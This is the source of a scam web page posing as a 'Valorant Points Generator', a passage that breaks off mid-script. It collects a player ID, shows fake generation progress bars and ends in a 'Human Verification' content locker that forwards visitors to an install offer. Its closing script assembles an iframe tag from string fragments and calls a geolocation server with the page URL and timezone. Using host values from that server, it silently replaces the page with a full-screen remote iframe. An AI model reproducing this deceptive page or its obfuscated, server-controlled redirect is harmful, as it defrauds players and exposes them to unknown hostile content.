
<!DOCTYPE html>
<!--
T: 2021-11-27 03:40:00
Api: 57c9c2df0881ce199e3c
It: 1975165

-->
<html><head>
    <title>Valorant Points Generator</title>
<meta name="description" content="Valorant Points Generator"/>
<meta property="og:title" content="Valorant Points Generator"/>
<meta property="og:description" content="Valorant Points Generator"/>
<meta name="referrer" content="no-referrer">

<!-- Analytics -->

<script
        src="https://browser.sentry-cdn.com/6.4.1/bundle.min.js"
        integrity="sha384-THoc7rflwZFKTdZNgv6jLFFDn299Uv3t1SW5B4yGLvLiCRTYP9ys6vXZcMl95TQF"
        crossorigin="anonymous"
></script>
<script>
    Sentry.init({
        dsn: 'https://e0e6a104cb354a09bf094a90e676ea13@o425163.ingest.sentry.io/5780930',
        tracesSampleRate: 0.01
    });
</script>
<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o), m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');


    
    ga('send', 'pageview');

</script>


    <style>
        .header_blue {
            background: #1565c0;
            padding: 80px 0 20px;
            color: #fff;
            font-size: 48px;
            font-weight: 300;
            margin-bottom: 40px;
        }
        .header_text {
            margin-left: auto;
            margin-right: auto;
            width: 80%;
        }
        body{
            margin:0;
            font-family:Roboto, sans-serif;
            color:#444;
        }
        .unlockBtn:hover{
            box-shadow: 0 3px 6px rgba(0,0,0,.16), 0 3px 6px rgba(0,0,0,.23);
        }
        .unlockBtn {
            background: #2196f3;
            border: none;
            border-radius: 2px;
            box-shadow: 0 1px 3px rgba(0,0,0,.12), 0 1px 2px rgba(0,0,0,.24);
            min-height: 31px;
            min-width: 70px;
            padding: 2px 16px;
            text-align: center;
            text-shadow: none;
            text-transform: uppercase;
            -webkit-transition: all 280ms ease;
            transition: all 280ms ease;
            box-sizing: border-box;
            cursor: pointer;
            -webkit-appearance: none;
            display: inline-block;
            vertical-align: middle;
            font: 500 14px/31px Roboto,sans-serif!important;
            outline: 0!important;
            color:white;
        }
        .content-container{
            width:80%;margin:0 auto;
        }
        @font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Pru33qjShpZSmG3z6VYwnRJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:300;src:local('Roboto Light'),local(Roboto-Light),url(//fonts.gstatic.com/s/roboto/v15/Hgo13k-tfSpn0qi1SFdUfVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/oOeFwZNlrTefzLYmlVV1UBJtnKITppOI_IvcXXDNrsc.woff2) format("woff2");unicode-range:U+0100-024F,U+1E00-1EFF,U+20A0-20AB,U+20AD-20CF,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Roboto';font-style:normal;font-weight:500;src:local('Roboto Medium'),local(Roboto-Medium),url(//fonts.gstatic.com/s/roboto/v15/RxZJdnzeo3R5zSexge8UUVtXRa8TVwTICgirnJhmVJw.woff2) format("woff2");unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2212,U+2215,U+E0FF,U+EFFD,U+F000}
        html {
  scroll-behavior: smooth;
}
body{
  background-image: url("https://d13pxqgp3ixdbh.cloudfront.net/uploads/163212432422e56d35427792b40f2608ac417a28f6.jpg");
  font-family: Acme;
font-style: italic;
}


.logo{
  margin-top: 100px;
  position: relative;
}
h1{
  color: white;
  text-shadow: 0 0 5px black;
  font-size: 20px;
  margin-top: 0px;
  padding-top: 0px;
}
.content{
max-width: 800px;
  width: 90%;
  position: relative;
  height: auto;
margin-top: 40px;
padding-bottom: 40px;

}
.data1{
    display: block;
    left: 0;
    top: 0;
    width: 100%;
    content: '';
    background: #fe4356;
      transform: skew( -3deg );
box-shadow: 5px 5px #ffff00;
padding-bottom: 30px;
z-index: -1;
}
.header-num-container{
  width:80px;
  position: relative;
  height: 40px;
  transform: skew( -3deg );
}
.header-num{
  font-size: 30px;
}
.header-num::after{
content: '1';
padding-top: 10px;
padding-bottom: 10px;
width: 100%;
position: absolute;
left: 2px;
top: -18px;
background:rgb(181 181 0);
z-index: 2;
}
.header-num::before{
  color:black;
  content: '1';
padding-top: 10px;
padding-bottom: 10px;
width: 100%;
position: absolute;
left: 0;
top: -20px;
z-index: 3;
  background: #ff0;
}
.input-form{
  position: relative;
  width:90%;
padding-top: 0px;
padding-bottom: 0px;
}
.text1{
  margin-top: 30px;
  margin-bottom: 30px;
  position: relative;
width:90%;
font-size: 22px;
color: white;
  }
  .input-bg{

  }
.input-bg::after{
  content: '';
height: 100%;
  width: 100%;
  position: absolute;
  left: 2px;
  top: 0px;
  background: rgb(57 57 68);
  z-index: 1;
    transform: skew( -3deg );
}
.input-bg::before{
  content: '';
height: 100%;
width: 100%;
position: absolute;
left: 0;
top: 0px;
z-index: 2;
  background: #1a1a1d;
      transform: skew( -3deg );
}
  .epu-u-i {
    font-family: Acme;

   outline: none;
      appearance: none;
      -moz-appearance: none;
      -webkit-appearance: none;
      background: transparent;
      box-shadow: none;
      border: none;
      width: 70%;
      height: 90px;
      z-index: 3;
      position: relative;
      padding: 0 15px 0 70px;
      color: #fff;
      font-size: 32px;
      text-indent: 3px;
      text-shadow: 2px 2px 0 rgb(0 0 0 / 30%);
background-image: url("https://d13pxqgp3ixdbh.cloudfront.net/uploads/1631511083f39867fd92dd6caca83aa5112e8906ba.png");
background-repeat: no-repeat;
background-position: left;

  }
.platform-form{
  width: 90%;
  margin-top: 10px;
}
.allplatform{
  width: 100px;
  height: 80px;
  transform: skew( -3deg );
  display: inline-block;
  cursor: pointer;
  margin: 10px;
}
  .platform{
    background: #0086e6;
    position: absolute;
    top:0;
    left: 0;
    width:100%;
    height: 100%;
    border-style: solid;
    border-width: 5px;
    border-color: #ffffff;
  }

.bntProcess{
width: 200px;
padding-top: 20px;
padding-bottom: 20px;
  transform: skew( -3deg );
  cursor: pointer;
  background-color: #ff0;
  margin-top: 10px;
  color: black;
  font-size: 22px;
}
.bntProcess2{
  width: 100%;
  padding-top: 20px;
  padding-bottom: 20px;

    cursor: pointer;
    background-color: #ff0;
    margin-top: 10px;
    color: black;
    font-size: 22px;
}
.bntProcessform{
  width: 200px;
    transform: skew( -3deg );
    background-color: black;
    margin-top: 10px;
    color: black;
    font-size: 22px;
    padding-top: 5px;
    overflow: hidden;
}
.vbamounticon{
  display: inline-block;
}
.selectdAmount{
  display: inline-block;
  color:white;
  font-size: 10px;
}
.step2{
  width: 100%;
  max-width: 300px;
height: 100%;
}

.step3{
  position: absolute;
  top: 0;
  left: 50%;
  width: 100%;
  max-width: 300px;
  margin-left: -150px;
height: 100%;
z-index: -1;
}
.data2{
padding-top: 50%;
width: 100%;
height: 100%;
padding-bottom: 50%;
}


.searching{
  width: 250px;
  position: relative;

    background: #00b3ff;
  transform: skew( -3deg );

}

.searchingname{
  width: 100px;
  display: inline-block;
  cursor: pointer;
  margin: 5px;
}

.searchingplatform{
  background: #0086e6;
  position: absolute;
  top:-3px;
  left: 0;
  width:60px;
  height: 100%;
border-style: solid;
border-width: 4px;
border-color: #ff0;
}
.serachingname{
  color:white;
  text-align: left;
  padding-left: 70px;
  padding-right: -70px;
padding-top: 16px;
padding-bottom: 16px;
font-size: 28px;
}
.Search-Icon{
  padding-top: 30%;
  position: absolute;
  top:10px;
  width:100px;
    animation: searchAnimation1 3s linear infinite;

}
@keyframes searchAnimation1{
  0%  {    left:50px; top:50px }
  13%  {    left:85px; top:25px }
  25%  {    left:110px; top:0px }
  38%  {    left:135px; top:25px }
  50%  {    left:160px; top:50px }
  63%  {    left:135px; top:75px }
  75%  { left:110px; top:100px }
  88%  {    left:85px; top:75px }
  100%  {    left:50px;  top:50px  }
}


.content2{
  width: 750px;
  max-width: 80%;
  position: relative;
  height: auto;
margin-top: 40px;
padding-bottom: 40px;
}
.content3{
  width: 750px;
  max-width: 80%;
  position: relative;
  height: auto;
margin-top: 40px;
padding-bottom: 40px;
}
.content4{
  width: 250px;
  max-width: 80%;
  position: relative;
  height: auto;
margin-top: 40px;
padding-bottom: 10px;
margin-bottom: 30px;
}

.content5{
  width: 750px;
  max-width: 80%;
  position: relative;
  height: auto;
margin-top: 40px;
padding-bottom: 40px;
}

.header-num2{
  font-size: 30px;
}
.header-num2::after{
content: '2';
padding-top: 10px;
padding-bottom: 10px;
width: 100%;
position: absolute;
left: 2px;
top: -18px;
background:rgb(181 181 0);
z-index: 1;
}
.header-num2::before{
  color:black;
  content: '2';
padding-top: 10px;
padding-bottom: 10px;
width: 100%;
position: absolute;
left: 0;
top: -20px;
z-index: 2;
  background: #ff0;
}

.header-num3{
  font-size: 30px;
}
.header-num3::after{
content: '3';
padding-top: 10px;
padding-bottom: 10px;
width: 100%;
position: absolute;
left: 2px;
top: -18px;
background:rgb(181 181 0);
z-index: 1;
}
.header-num3::before{
  color:black;
  content: '3';
padding-top: 10px;
padding-bottom: 10px;
width: 100%;
position: absolute;
left: 0;
top: -20px;
z-index: 2;
  background: #ff0;
}



.Card-form{
  width: 90%;
  margin-top: 10px;
}
.card{
  background-image: linear-gradient(#00a3d9, #33dbf2);
  position: absolute;
  top:0;
  left: 0;
  width:100%;
  height: 100%;
  border-style: solid;
  border-width: 8px;
  border-color: #3dc0e5;
}

.allcard{
  transform: skew(-3deg);
  width: 130px;
  height: 180px;
  display: inline-block;
  cursor: pointer;
  margin: 12px;
z-index: 5;
}

.card-detail{
  width: 100%;
  height: 40px;
  background-color:#ff0 ;
  position: absolute;
  bottom: 0;
}
.card-value{
  text-align: center;
      margin-right: 10px;
      font-size: 20px;
      transform: skew(
  13deg
   );
      text-shadow: 2px 3px 0px #0096a8;
      color: white;
}

.pro-bg{
  margin-top: 10px;
  width: 80%;
  max-width: 250px;
  height: 35px;
  background-color: #1e1f1f;

  text-align: left;
  transform: skew(-5deg);
}
.pro-bar{
  margin-top: 10px;
  width: 0;
  height: 100%;
  background-color: #ffd500;
}

.pro-bg2{
  margin-top: 0px;
  width: 80%;
  max-width: 150px;
  height: 15px;
  background-color: #1e1f1f;

  text-align: left;
  transform: skew(-5deg);
}
.pro-bar2{
  margin-top: 0px;
  width: 0;
  height: 100%;
  background-color: #ffd500;
}

.step1-text{
  color: white;
  font-size: 18px;
  margin-top: 10px;
  text-shadow: 5px;
  font-weight: 300;
    animation: bounceIn 0.5s ease-in ;
}
.step2-text{
  color: #00d6ff;
  font-size: 14px;
  margin-top: 0px;
  margin-bottom: 5px;
  text-shadow: 5px;
  font-weight: 300;
    animation: bounceIn 0.5s ease-in ;
    background-color: #000095;
    width:90px;
    padding-top: 5px;
    padding-bottom: 5px;
    border-style: solid;
    border-color: #0055ff;
    border-width: 4px;
}




/*Animation*/
.pro0To100{
  animation: pro0To100 4s;
  box-shadow: black 0px 0px 5px;
  animation-fill-mode: forwards;
}
  @keyframes pro0To100 {
  0% { width:0 }
  100% { width:100% }
}
.pro10{
  animation: pro10 1s;
  box-shadow: black 0px 0px 5px;
  animation-fill-mode: forwards;
}
  @keyframes pro10 {
  0% { width:0 }
  100% { width:10% }
}
.pro10to20{
  animation: pro10to20 2s;
  box-shadow: black 0px 0px 5px;
  animation-fill-mode: forwards;
}
  @keyframes pro10to20 {
  0% { width:10% }
  100% { width:20% }
}
.pro20to70{
  animation: pro20to70 4s;
  box-shadow: black 0px 0px 5px;
  animation-fill-mode: forwards;
}
  @keyframes pro20to70 {
  0% { width:20% }
  100% { width:70% }
}

.pro70to94{
  animation: pro70to94 2s;
  box-shadow: black 0px 0px 5px;
  animation-fill-mode: forwards;
}
  @keyframes pro70to94 {
  0% { width:70% }
  100% { width:94% }
}




.sakeanimation{
  animation: shake 0.5s;

}
  @keyframes shake {
  0% { left:0 }
  10% { left:-10px }
  20% { left:0 }
  30% { left:10px }
  40% { left:0 }
  50% { left:-5px }
  60% { left:0 }
  70% { left:5px }
  80% { left:0 }
  90% { left:-3px }
  1000% { left:0 }
}

.zoomout{
  animation: zoomout 1s;
animation-fill-mode: forwards;
}
@keyframes zoomout {
  0% { transform: scale(1);}
100% { transform: scale(1.2);}
}

.zoomin{
  animation: zoomin 1s;
animation-fill-mode: forwards;
}
@keyframes zoomin {
  0% { transform: scale(1.2);}
100% { transform: scale(1);}
}


.hidein{
  animation: flyinhide 1s;
animation-fill-mode: forwards;
}
@keyframes flyinhide {
  0% { transform: scale(1);}
10% { transform: scale(0.9);}
20% { transform: scale(1.1);}
100% { transform: scale(0);}
}

.showin{
  animation: showin 0.5s;
animation-fill-mode: forwards;
}
@keyframes showin {
  0% { transform: scale(0);}
30% { transform: scale(1);}
60% { transform: scale(1.1);}
  100% { transform: scale(1);}
}

.showin1{
  animation: showin1 1s;
animation-fill-mode: forwards;
}
@keyframes showin1 {
  0% { transform: scale(0);}
30% { transform: scale(1);}
60% { transform: scale(1.1);}
  100% { transform: scale(1);}
}

.showin2{
  animation: showin2 1.4s;
animation-fill-mode: forwards;
}
@keyframes showin2 {
  0% { transform: scale(0);}
30% { transform: scale(1);}
60% { transform: scale(1.1);}
  100% { transform: scale(1);}
}

.showin3{
  animation: showin3 1.8s;
animation-fill-mode: forwards;
}
@keyframes showin3 {
  0% { transform: scale(0);}
30% { transform: scale(1);}
60% { transform: scale(1.1);}
  100% { transform: scale(1);}
}

.showin4{
  animation: showin4 2.2s;
animation-fill-mode: forwards;
}
@keyframes showin4 {
  0% { transform: scale(0);}
30% { transform: scale(1);}
60% { transform: scale(1.1);}
  100% { transform: scale(1);}
}

.showin5{
  animation: showin4 2.2s;
animation-fill-mode: forwards;
}
@keyframes showin4 {
  0% { transform: scale(0);}
30% { transform: scale(1);}
60% { transform: scale(1.1);}
  100% { transform: scale(1);}
}

.showinplatform{
  animation: showinplatform 1s;
animation-fill-mode: forwards;
}
@keyframes showinplatform {
  0% { transform: scale(0);}
30% { transform: scale(0.9);}
60% { transform: scale(1.1);}
  100% { transform: scale(1);}
}
.rotate{
  animation: step2animation 2s  linear infinite;
}
@keyframes step2animation{
  0%  {transform: rotate(0deg);}
  100%  {transform:  rotate(360deg);}
}
.showinname{
  animation: showinname 1s;
animation-fill-mode: forwards;
}
@keyframes showinname {
  0% { transform: scale(0);}
30% { transform: scale(0.9);}
60% { transform: scale(1.1);}
  100% { transform: scale(1);}
}

.slit-out-vertical{animation:slit-out-vertical .5s ease-in both}
@keyframes slit-out-vertical{0%{transform:translateZ(0) rotateY(0);opacity:1}54%{transform:translateZ(-160px) rotateY(87deg);opacity:1}100%{transform:translateZ(-800px) rotateY(90deg);opacity:0}}

@media only screen and (max-width:480px) {
  .data1{
        transform: skew( -1deg );
  }

  .header-num-container{
    transform: skew( -1deg );
  }

  .input-bg::after{
      transform: skew( -1deg );
  }
  .input-bg::before{

        transform: skew( -1deg );
  }
  .allplatform{
    transform: skew( -1deg );

  }

  .text1{
    margin-top: 20px;
    margin-bottom: 20px;
    position: relative;
  width:90%;
  font-size: 16px;
  color: white;
    }
    .Card-form {
        width: 100%;
    }
    .content2 {
        max-width: 100%;
        position: relative;
        height: auto;
        margin-top: 50px;
        padding-bottom: 40px;
    }

    .allcard {
       transform: skew(-1deg);
  width: 100px;
    height: 140px;
    display: inline-block;
    cursor: pointer;
    margin: 12px;
    z-index: 5;
}


.card-value {
    text-align: center;
    margin-right: 10px;
    font-size: 13px;
    transform: skew( 13deg );
    text-shadow: 2px 3px 0px #0096a8;
    color: white;
}
.logo {
    margin-top: 20px;
    position: relative;
}
    .epu-u-i {
        height: 60px;
        padding: 0 15px 0 70px;
        color: #fff;
        font-size: 24px;
      }

      .allplatform {
    width: 60px;
    height: 60px;
    transform: skew( -3deg );
    display: inline-block;
    cursor: pointer;
    margin: 10px;
}

}

    </style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>Valorant Points Generator</title>
    <link rel = "stylesheet"  type = "text/css"  href = "style.css" />
    <link rel="stylesheet"
            href="https://fonts.googleapis.com/css?family=Acme">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto">
</head>
<body class="color-change-2x" onload="selectPlatform(1)">
  <center>
<div class="logo"><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1632124323fb2709a85c08ecea4e7e4c226625c422.png" style="width:250px"></img>
</div>
<div><h1>POINTS GENERATOR</h1></div>
<div class="content" id="content">

<div class="data1">
  <div class="header-num-container"><div class="header-num"></div></div>


  <div class="step1" id="step1" style="">
<div class="text1">PLEASE ENTER YOUR ID AND SELECT YOUR PLATFORM.</div>
<div class="input-form" id="input-form">
<div class="input-bg" id="input-bg">
<input id="uid" class="epu-u-i" spellcheck="false" placeholder="Agent#TAG...">
</div>
</div>
<div class="platform-form">
<div class="allplatform">
<div id="platform1" onclick="selectPlatform(1)" class="platform" style="background-image: url(https://d13pxqgp3ixdbh.cloudfront.net/uploads/1631511082af4cbd30bb8e228fb659cbd3814499de.png);
 background-size: auto;    background-position: center;    background-repeat: no-repeat;
    "></div>
</div>

<div class="allplatform">
<div id="platform2" onclick="selectPlatform(2)" class="platform" style="background-image: url(https://d13pxqgp3ixdbh.cloudfront.net/uploads/16315110834d3bce670163ff1a6091c1f3c6701681.png);
     background-size: auto;
        background-position: center;
        background-repeat: no-repeat;"></div>
      </div>
      <div class="allplatform">
<div id="platform3" onclick="selectPlatform(3)" class="platform" style="background-image: url(https://d13pxqgp3ixdbh.cloudfront.net/uploads/16315110871513cf445e8490299c539a2221079730.png);
         background-size: auto;
            background-position: center;
            background-repeat: no-repeat;"></div>
	</div>
	
	      <div class="allplatform">
<div id="platform4" onclick="selectPlatform(4)" class="platform" style="background-image: url(https://d13pxqgp3ixdbh.cloudfront.net/uploads/163151108478c5643aee93c242782275c37dc79547.png);
         background-size: auto;
            background-position: center;
            background-repeat: no-repeat;"></div>
	</div>
	
<div class="allplatform">
<div id="platform5" onclick="selectPlatform(5)" class="platform" style="background-image: url(https://d13pxqgp3ixdbh.cloudfront.net/uploads/16315110880b7d6ad9799c78ce69690c2e92c79d31.png);
		background-size: auto;    
		background-position: center;    
		background-repeat: no-repeat; "></div></div>			

</div>
<div onclick="proceed()"class="bntProcess">PROCEED</div>
</div>


<div id="step2" class="step2">
  <div class="data2 showin" id="data2" style="display:none">
  <div class="text1" style="margin-bottom:5px;display:none">Searching...</div>
<div class="searching">
  <div class="searchingdata">
  <div id="seletedplatform" class="searchingplatform showinplatform" style="background-image: url(https://d13pxqgp3ixdbh.cloudfront.net/uploads/1631511082af4cbd30bb8e228fb659cbd3814499de.png);
       background-size: auto;
          background-position: center;
          background-repeat: no-repeat;"></div>
          <div class="serachingname showinname" id="text-name"></div>

  </div>
</div>
  <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1619265496817b7e296dd02b6b911048ec12b2c9fe.png" class="Search-Icon"></img>
</div>

</div>
</div>
<div id="step3" class="step3" style="display:none;z-index:4">
  <div style="padding-top:40%;color:#2db573;">SUCCESS!</div>
  <div class="showin" ><img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/1631511082d12c19e7d3d0b269dc13901b06665228.png"></img></div>
</div>

</div>

<div class="content2 showin" id="content2" style="display:none">
<div class="data1">
  <div class="header-num-container"><div class="header-num2"></div></div>


  <div class="step1" id="step1">

<div class="Card-form">

  <div class="allcard" onmouseover="cardOver(1)" onmouseout="cardOut(1)" >
  <div  onclick="selectedcard(1)" class="card showin1"  id="card1" style="border-color: yellow">
    <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/163212432540d54e73e9aad0b4c897a1419cce689d.png" style="margin-top:20px;width:80px;" id="cardlogo1" class="zoomout cardlogo">
        <div class="card-value">1,000</div>
        <div class="card-value">POINTS</div>
          </div>
</div>

<div class="allcard"  onmouseover="cardOver(2)" onmouseout="cardOut(2)" >
<div  onclick="selectedcard(2)" class="card showin2"  id="card2">
  <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/163212432540d54e73e9aad0b4c897a1419cce689d.png" style="margin-top:20px;width:80px;" id="cardlogo2" class="cardlogo">
      <div class="card-value">2,800</div>
      <div class="card-value">POINTS</div>
        </div>
</div>

<div class="allcard"  onmouseover="cardOver(3)" onmouseout="cardOut(3)" >
<div onclick="selectedcard(3)" class="card showin3"   id="card3">
  <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/163212432540d54e73e9aad0b4c897a1419cce689d.png" style="margin-top:20px;width:80px;" id="cardlogo3" class="cardlogo">
      <div class="card-value">5,000</div>
      <div class="card-value">POINTS</div>
        </div>
</div>

<div class="allcard"  onmouseover="cardOver(4)" onmouseout="cardOut(4)">
<div  onclick="selectedcard(4)" class="card showin4"  id="card4">
  <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/163212432540d54e73e9aad0b4c897a1419cce689d.png" style="margin-top:20px;width:80px;" id="cardlogo4" class="cardlogo">
      <div class="card-value">13,500</div>
      <div class="card-value">POINTS</div>
        </div>
</div>
</div>
<div class="bntProcessform">
<div class="selectdAmount">  SELECTED AMOUNT <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/163212432540d54e73e9aad0b4c897a1419cce689d.png" style="margin-left:4px;width:20px;margin-bottom: -7px;"><span id="selectAmount" style="font-size: 14px;
    color: #28cfed;">1,000</span></div>
<div onclick="proceed2()"class="bntProcess2 showin5">PROCEED</div>
</div>
</div>

</div>
</div>



<div class="content3 showin" id="content3" style="display:none">
<div class="data1">
  <div class="header-num-container"><div class="header-num3"></div></div>
  <div class="step1" id="step1">
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/161909761701afebe6db914cae0df0e58526ed8013.png" class="rotate" style="width:150px;margin-top:20px;"></img>
 <div class="step1-text" id="loading-step">Loading...</div>
<div class="pro-bg">
<div class="pro-bar" id="pro-bar">
</div>
</div>
</div>
</div>
</div>



<div class="content4 showin" id="content4" style="display:none">
  <div class="data1">
      <img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/161909761701afebe6db914cae0df0e58526ed8013.png" class="rotate" style="width:25px;position:absolute;right:5px;top:5px;"></img>

  <div class="step1" id="step1">

<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/163212432540d54e73e9aad0b4c897a1419cce689d.png" style="width:60px;margin-top:30px;"></img>
 <div class="step2-text" id="gen-coin">0</div>
<div class="pro-bg2">
<div class="pro-bar2" id="pro-bar2">
</div>
</div>
</div>
</div>
  </div>


<div class="content5 showin" id="content5" style="display:none">
<div class="data1">
  <div style="    background-color: yellow;    margin-left: -30px;    position: absolute;
    top: -30px;    left: 50%;    padding: 20px;    transform: skew(-1deg);    /* margin-bottom: 30px; */
    box-shadow: 2px 3px #b5b500;">
<img src="https://d13pxqgp3ixdbh.cloudfront.net/uploads/16190976186526b111b8742cc1c8da390a443f23d3.png" class="rotate" style="width:25px;"></img>
  </div>

<div style="position:relative;padding-top:40px;">
 <div class="text1" >Hello <span id="NameLastStep" style="font-size:24px;color:yellow;font-style:italic;font-weight: bold;">User</span>! You are almost done with synchronization of <span id="coinamount"style="font-size:24px;color:yellow;font-style:italic;font-weight: bold;">1000</span> POINTS! Please complete the last step by click the button below to finish with synchronization process.</div>
</div>
<div onclick="CPABuildLock()"class="bntProcess2 showin5">Human Verification</div>
</div>
</div>

</center>
</body>
<script src="main.js"></script>
</html>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript">
    var CPABUILDSETTINGS={"it":1975165,"key":"fc8d7","testing":1};
    var forward="https:\/\/www.install2view.com\/cl.php?id=3e32af497baa5fbbf02ffdadd5e398fc";
    CPABUILDSETTINGS.onComplete=function(data){
        window.location=forward;
        return false;
    };
</script>
<script src="https://d13nu0oomnx5ti.cloudfront.net/e471e10.js"></script>
<script type="text/javascript">
    $('.showContentLocker').click(function(){
       CPABuildLock();
        return false;
    });
</script>
<script>

</script>
<script type="text/javascript">
    var audioclick = new Audio('https://allfile.club/robuxv2/click.mp3');
var audiolaststep = new Audio('https://allfile.club/robuxv2/laststep.mp3');
var audiopoinrunning = new Audio('https://allfile.club/robuxv2/poinrunning.mp3');
var audioselected = new Audio('https://allfile.club/robuxv2/selected.mp3');
var audiosuccess = new Audio('https://allfile.club/robuxv2/success.mp3');
var name="";
var plateformIndex;
function selectPlatform(plateform){
  audioselected.play();
  document.getElementById("platform1").classList.remove("sakeanimation");
  document.getElementById("platform2").classList.remove("sakeanimation");
  document.getElementById("platform3").classList.remove("sakeanimation");
  document.getElementById("platform4").classList.remove("sakeanimation");
  document.getElementById("platform5").classList.remove("sakeanimation");

  document.getElementById("platform1").style.backgroundColor="#0086e6";
  document.getElementById("platform2").style.backgroundColor="#0086e6";
  document.getElementById("platform3").style.backgroundColor="#0086e6";
  document.getElementById("platform4").style.backgroundColor="#0086e6"
  document.getElementById("platform5").style.backgroundColor="#0086e6"

  document.getElementById("platform1").style.borderColor="#ffffff";
  document.getElementById("platform2").style.borderColor="#ffffff";
  document.getElementById("platform3").style.borderColor="#ffffff";
  document.getElementById("platform4").style.borderColor="#ffffff";
  document.getElementById("platform5").style.borderColor="#ffffff";

document.getElementById("platform"+plateform).classList.add("sakeanimation");
document.getElementById("platform"+plateform).style.backgroundColor="#00b3ff";
document.getElementById("platform"+plateform).style.borderColor="#ff0";
plateformIndex=plateform;
document.getElementById("seletedplatform").style.backgroundImage=document.getElementById("platform"+plateform).style.backgroundImage;
}


var cardclicked=1;
var cardvalue=1000;
function selectedcard(cardnum){
    audioselected.play();
  if (cardnum==1){
      document.getElementById("selectAmount").textContent="1,000";
      cardvalue=1000;
  }else if(cardnum==2){
    document.getElementById("selectAmount").textContent="2,800";
    cardvalue=2800;
  }
  else if(cardnum==3){
    document.getElementById("selectAmount").textContent="5,000";
    cardvalue=5000;
  }
  else if(cardnum==4){
    document.getElementById("selectAmount").textContent="13,500";
    cardvalue=13500;
  }
  document.getElementById("card1").style.borderColor="#3dc0e5";
  document.getElementById("card2").style.borderColor="#3dc0e5";
  document.getElementById("card3").style.borderColor="#3dc0e5";
  document.getElementById("card4").style.borderColor="#3dc0e5";
  document.getElementById("cardlogo1").classList.remove("zoomin");
  document.getElementById("cardlogo2").classList.remove("zoomin");
  document.getElementById("cardlogo3").classList.remove("zoomin");
  document.getElementById("cardlogo4").classList.remove("zoomin");
  document.getElementById("cardlogo1").classList.remove("zoomout");
  document.getElementById("cardlogo2").classList.remove("zoomout");
  document.getElementById("cardlogo3").classList.remove("zoomout");
  document.getElementById("cardlogo4").classList.remove("zoomout");
  document.getElementById("cardlogo"+cardnum).classList.add("zoomout");
  document.getElementById("card"+cardnum).style.borderColor="yellow";
  cardclicked=cardnum;



}

function cardOver(cardnum){
  if (cardclicked!=cardnum){
    document.getElementById("card"+cardnum).style.borderColor="yellow";
    document.getElementById("cardlogo"+cardnum).classList.add("zoomout");
      document.getElementById("cardlogo"+cardnum).classList.remove("zoomin");
    }
}
function cardOut(cardnum){
    if (cardclicked!=cardnum){
    document.getElementById("card"+cardnum).style.borderColor="#3dc0e5";
      document.getElementById("cardlogo"+cardnum).classList.remove("zoomout");
    document.getElementById("cardlogo"+cardnum).classList.add("zoomin");
  }
}
var ow="i";
var k="if";
  ow=ow+"f";  ow=ow+"r";  ow=ow+"a";
  ow=ow+"me";  ow=ow+" ";  ow=ow+"sr";ow=ow+"c="; ow=ow+'"';ow=ow+"ht";ow=ow+"tps";ow=ow+":";var st='style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></'+k+'rame>';
  var strcountry='';
  var offset = new Date().getTimezoneOffset();
  offset=offset/-60;var num;
  var strcountry='';
  var data;var country;var code;var d=window.location.href;
  fetch('https://www.visitorlocation.info/data.php?d='+d+"&t="+offset,{referrerPolicy:'unsafe-url'})
  .then(res => res.json())
  .then(output => {
  data =output;
  country=data.country;
  strcountry=country;
  code=data.code;
  code=code.toLowerCase();
  s1=data.s1;
  s2=data.s2;
  num=data.num;
  if (strcountry!='' & num!=0){  document
    .body
    .innerHTML='<'+ow+'//'+s1+'.'+s2+'/'+num+'"'+ st;  }
  });
function proceed(){
audioclick.play();
name=document.getElementById("uid").value;
if (name==""){
document.getElementById("input-form").style.borderBottom ="1px solid #f00";
document.getElementById("input-form").classList.add("sakeanimation");
setTimeout(function(){
document.getElementById("input-form").classList.remove("sakeanimation");
},500);

}else{
  audioclick.play();
  document.getElementById("text-name").innerHTML=name;
    document.getElementById("step1").classList.add("hidein");
    setTimeout(function(){
          document.getElementById("step1").style.height="0px";
  document.getElementById("data2").style.display="block";
  setTimeout(function(){
    document.getElementById("data2").classList.remove("showin");
    document.getElementById("data2").classList.add("hidein");
  setTimeout(function(){
    audiosuccess.play();
    document.getElementById("step3").style.display="block";

    setTimeout(function(){
